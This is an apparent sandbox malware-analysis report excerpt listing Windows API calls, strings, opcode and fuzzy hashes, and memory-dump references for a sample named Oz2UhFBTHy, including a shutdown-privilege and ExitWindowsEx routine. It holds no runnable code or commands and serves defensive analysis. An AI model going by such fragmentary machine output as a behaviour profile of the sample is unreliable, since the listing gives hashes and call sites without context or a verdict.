                                                                                                      • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                                                                      • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                                      • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 2340568224-0
                                                                                                      • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                                      • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                                                      • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                                      • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                                                      APIs
                                                                                                      • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CharPrev
                                                                                                      • String ID:
                                                                                                      • API String ID: 122130370-0
                                                                                                      • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                                      • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                                                      • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                                      • Instruction Fuzzy Hash:
                                                                                                      APIs
                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      • Opcode ID: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                                      • Instruction ID: 1e7236936b067224bcb0a7c190bcfb18a105a15b1652d3161176e1d0ad605fa4
                                                                                                      • Opcode Fuzzy Hash: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                                      • Instruction Fuzzy Hash: 43116371A042059BDB00EF19C881B5B7794AF44359F05807AF958AB2C6DB38E800CBAA
                                                                                                      APIs
                                                                                                      • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 1263568516-0
                                                                                                      • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                                      • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                                                      • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                                      • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 2962429428-0
                                                                                                      • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                                      • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                                                      • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                                      • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                                                      APIs
                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 1263568516-0
                                                                                                      • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                                      • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                                                      • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                                      • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                                                                      APIs
                                                                                                      • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 0040949D
                                                                                                      • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004094A2
                                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                      • String ID: SeShutdownPrivilege
                                                                                                      • API String ID: 107509674-3733053543
                                                                                                      • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                                      • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                                                      • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                                      • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                                                      APIs
                                                                                                      • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409C3E
                                                                                                      • SizeofResource.KERNEL32(00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 00409C51
                                                                                                      • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000), ref: 00409C63
                                                                                                      • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92), ref: 00409C74
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                      • String ID:
                                                                                                      • API String ID: 3473537107-0
                                                                                                      • Opcode ID: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                                      • Instruction ID: 5c2a5118689e511edc0a9dde7e1b9e77d0383d271af581b44440e1e73e890ea9
                                                                                                      • Opcode Fuzzy Hash: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                                      • Instruction Fuzzy Hash: B0E07E80B8874726FA6576FB08C7B6B008C4BA570EF00003BB700792C3DDBC8C04462E
                                                                                                      APIs
                                                                                                      • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale
                                                                                                      • String ID:
                                                                                                      • API String ID: 2299586839-0
                                                                                                      • Opcode ID: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                                                      • Instruction ID: 1db3d1c1bb6fab5f91442dea8a08a829cd161d84d3a7e1f0c2fe21aaaafd944f
                                                                                                      • Opcode Fuzzy Hash: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                                                      • Instruction Fuzzy Hash: 9ED02EA230E2006AE210808B2C84EBB4A9CCEC53A0F00007FF648C3242D2208C029B76
                                                                                                      APIs
                                                                                                      • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: SystemTime
                                                                                                      • String ID:
                                                                                                      • API String ID: 2656138-0
                                                                                                      • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                                      • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                                                      • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                                      • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                                                      APIs
                                                                                                      • GetVersionExA.KERNEL32(?,004065F0,00000000,004065FE,?,?,?,?,?,0040A622), ref: 00405D02
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Version
                                                                                                      • String ID:
                                                                                                      • API String ID: 1889659487-0
                                                                                                      • Opcode ID: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                                                      • Instruction ID: 4c33b40dd65743d8d98a5ffd827b1eb297e5dd4f71424004bfe2d5ab9b26ea54
                                                                                                      • Opcode Fuzzy Hash: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                                                      • Instruction Fuzzy Hash: 00C0126040070186D7109B31DC02B1672D4AB44310F4405396DA4963C2E73C80018A6E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
                                                                                                      • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                                                                      • Opcode Fuzzy Hash: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
                                                                                                      • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 0040704D
                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 004070A1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressCloseHandleModuleProc
                                                                                                      • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                                      • API String ID: 4190037839-2401316094
                                                                                                      • Opcode ID: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                                                      • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                                                      • Opcode Fuzzy Hash: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                                                      • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                                                      • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                                                      • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                                                      • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                                                      • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                                                      • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                                                      • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                                                      • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                                                      • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                      • String ID:
                                                                                                      • API String ID: 1694776339-0
                                                                                                      • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                                      • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                                                      • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                                      • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                                                      APIs
                                                                                                      • GetSystemDefaultLCID.KERNEL32(00000000,0040560C,?,?,?,?,00000000,00000000,00000000,?,004065EB,00000000,004065FE), ref: 004053DE
                                                                                                        • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                                        • Part of subcall function 00405258: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale$DefaultSystem
                                                                                                      • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                                      • API String ID: 1044490935-665933166
                                                                                                      • Opcode ID: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                                                      • Instruction ID: cc137df54ae1fcbb63b87987e69a719e9c27c4b31815d0debc5c9b1d2781c89a
                                                                                                      • Opcode Fuzzy Hash: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                                                      • Instruction Fuzzy Hash: F8515374B00548ABDB00EBA59891A5F7769DB88304F50D5BBB515BB3C6CA3DCA058F1C
                                                                                                      APIs
                                                                                                      • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                                                      • LocalFree.KERNEL32(0070B060,00000000,00401AB4), ref: 00401A1B
                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,0070B060,00000000,00401AB4), ref: 00401A3A
                                                                                                      • LocalFree.KERNEL32(0070C060,?,00000000,00008000,0070B060,00000000,00401AB4), ref: 00401A79
                                                                                                      • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                                                      • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 3782394904-0
                                                                                                      • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                                      • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                                                      • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                                      • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                                                      APIs
                                                                                                      • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                                                      • ExitProcess.KERNEL32 ref: 00403DE5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExitMessageProcess
                                                                                                      • String ID: Error$Runtime error at 00000000$9@
                                                                                                      • API String ID: 1220098344-1503883590
                                                                                                      • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                                      • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                                                      • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                                      • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                                                      • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                                                      • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$AllocString
                                                                                                      • String ID:
                                                                                                      • API String ID: 262959230-0
                                                                                                      • Opcode ID: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                                                      • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                                                      • Opcode Fuzzy Hash: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                                                      • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                                                      APIs
